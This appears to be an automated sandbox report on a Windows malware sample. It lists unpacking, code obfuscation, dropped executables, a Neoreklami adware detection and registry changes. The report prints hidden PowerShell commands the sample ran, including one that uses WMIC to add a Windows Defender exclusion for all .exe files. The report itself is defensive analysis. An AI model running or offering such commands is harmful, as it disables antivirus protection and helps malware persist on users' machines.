Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Window found: window name: TMainForm Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Play Glock_is1 Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exe Static file information: File size 1957376 > 1048576
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1dd400
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: msvcp71.pdbx# source: is-IKU3H.tmp.11.dr
Source: Binary string: c:\rje\tg\e\obj\Release\ojc.pdb source: file.exe
Source: Binary string: BitLockerToGo.pdb source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.0000000001908000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msvcp71.pdb source: is-IKU3H.tmp.11.dr
Source: Binary string: c:\rje\tg\e\obj\Release\ojc.pdb4 source: file.exe
Source: Binary string: BitLockerToGo.pdbGCTL source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.0000000001908000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Unpacked PE file: 9.2.tyq3dazbB0crObgKIDGLxiAO.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Unpacked PE file: 13.2.playglock32x64.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Unpacked PE file: 9.2.tyq3dazbB0crObgKIDGLxiAO.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Unpacked PE file: 13.2.playglock32x64.exe.400000.0.unpack
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Binary contains a suspicious time stamp
Source: Y-Cleaner.exe.9.dr Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 8_2_00418320
PE file contains sections with non-standard names
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe.3.dr Static PE information: section name: .symtab
Source: Channel2[1].exe.3.dr Static PE information: section name: .eh_fram
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe.3.dr Static PE information: section name: .eh_fram
Source: setup[1].exe.3.dr Static PE information: section name: .sxdata
Source: Jrh6BLxH1aqS3cJle2sY_F2Q.exe.3.dr Static PE information: section name: .sxdata
Source: CheckTool[1].exe.3.dr Static PE information: section name: .symtab
Source: IZImiIFXXrvtVOHFozZW.dll.6.dr Static PE information: section name: .eh_fram
Source: service123.exe.6.dr Static PE information: section name: .eh_fram
Source: Install.exe.8.dr Static PE information: section name: .sxdata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_030225A1 push eax; retn 0071h 0_2_030225A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00567230 push ecx; ret 3_2_00567243
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_004065B8 push 004065F5h; ret 7_2_004065ED
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_004040B5 push eax; ret 7_2_004040F1
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_00408104 push ecx; mov dword ptr [esp], eax 7_2_00408109
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_00404185 push 00404391h; ret 7_2_00404389
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_00404206 push 00404391h; ret 7_2_00404389
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_0040C218 push eax; ret 7_2_0040C219
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_004042E8 push 00404391h; ret 7_2_00404389
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_00404283 push 00404391h; ret 7_2_00404389
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_00408F38 push 00408F6Bh; ret 7_2_00408F63
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_00411360 push ecx; mov dword ptr [esp], ecx 8_2_00411361
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_00413954 push eax; ret 8_2_00413972
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_00413CC0 push eax; ret 8_2_00413CEE
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0042D822 push eax; retf 9_2_0042D859
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0042A0F5 push esi; ret 9_2_0042A0FE
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0040D26E push ecx; ret 9_2_0040D281
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0042C41E pushad ; retf 9_2_0042C445
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_1000E891 push ecx; ret 9_2_1000E8A4
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_004AD8D0 push eax; retf 004Ah 9_2_004AD99D
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_004B80B1 pushad ; ret 9_2_004B80B5
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020DCB5F push esp; retf 9_2_020DCB67
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020DD15D push esp; retf 9_2_020DD15E
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020CD4D5 push ecx; ret 9_2_020CD4E8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00409954 push 00409991h; ret 11_2_00409989
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0040A04F push ds; ret 11_2_0040A050
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0040A023 push ds; ret 11_2_0040A04D
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00460088 push ecx; mov dword ptr [esp], ecx 11_2_0046008C
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004062CC push ecx; mov dword ptr [esp], eax 11_2_004062CD
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0049467C push ecx; mov dword ptr [esp], ecx 11_2_00494681
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004106E0 push ecx; mov dword ptr [esp], edx 11_2_004106E5
Source: file.exe Static PE information: section name: .text entropy: 7.999695640081768
Source: univ[1].exe.3.dr Static PE information: section name: .text entropy: 7.808776511715382
Source: tyq3dazbB0crObgKIDGLxiAO.exe.3.dr Static PE information: section name: .text entropy: 7.808776511715382
Source: Y-Cleaner.exe.9.dr Static PE information: section name: .text entropy: 7.918511524700298

Persistence and Installation Behavior
barindex
Yara detected Neoreklami
Source: Yara match File source: Process Memory Space: Install.exe PID: 8132, type: MEMORYSTR
Drops PE files to the document folder of the user
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Jump to dropped file
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_RegDLL.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\uninstall\is-R79QI.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Channel2[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\is-75FQC.tmp Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File created: C:\Users\user\AppData\Local\Temp\IZImiIFXXrvtVOHFozZW.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\is-O04L0.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe File created: C:\ProgramData\Edrax Smart Maker 9.28.47\Edrax Smart Maker 9.28.47.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\stories[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\is-IKU3H.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\libeay32.dll (copy) Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\univ[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe File created: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\ssleay32.dll (copy) Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_iscrypt.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\msvcp71.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\msvcr71.dll (copy) Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\CheckTool[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\uninstall\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\Qt5OpenGL.dll (copy) Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\is-86R9G.tmp Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe File created: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\setup[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\is-5ANFC.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\is-IVTOI.tmp Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe File created: C:\Users\user\AppData\Local\Temp\1u2wN0W4Z43Z310SAYDV85NF4w4\Bunifu_UI_v1.5.3.dll Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe File created: C:\Users\user\AppData\Local\Temp\1u2wN0W4Z43Z310SAYDV85NF4w4\Y-Cleaner.exe Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe File created: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\soft[1] Jump to dropped file
